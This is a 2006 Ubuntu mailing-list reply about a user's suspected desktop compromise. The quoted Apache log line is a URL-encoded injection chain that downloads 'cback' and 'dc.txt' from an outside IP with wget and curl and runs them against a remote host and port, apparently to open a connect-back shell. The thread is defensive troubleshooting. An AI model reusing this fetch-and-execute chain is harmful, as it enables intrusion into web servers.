Re: My home desktop was compromised, but how?

On di, 2006-02-28 at 15:44 -0500, Carthik Sharma wrote:
Somebody seems to have hacked into my desktop/server. I find files in
the /tmp/ (like "agent.8213)directory which I cannot open, these are
setuid-ed -- how do I open these?

These may vere well be normal, many applications place thing in /tmp.

Try sudo ls /tmp/agent.8213 to see the contents

In my apache access logs, there are things like
"http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%
20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%
208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt
%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%
20http://216.99.218.183/cback;chmod%20744%20cback;./cback%
20217.160.242.90%208081;curl%20-o%20dc.txt%
20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%
20217.160.242.90%208081;echo%20YYY;echo|"

That above is a valid url, and will take you to a script to deface
someone's php script etc, I suppose. Now, how did this malicious
hacker get in my computer?

That is just an attempt to deface a mambo site. If you don't use mambo:
don't worry (anyone can request any weird looking url on your server,
and it'll end up in your log). If you do run mambo: make sure you're up
to date.
--
Dennis K.
- Linux for human beings - http://www.ubuntu.com
- Linux voor normale mensen - htp://www.ubuntu-nl.org

Attachment: signature.asc
Description: This is a digitally signed message part

--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users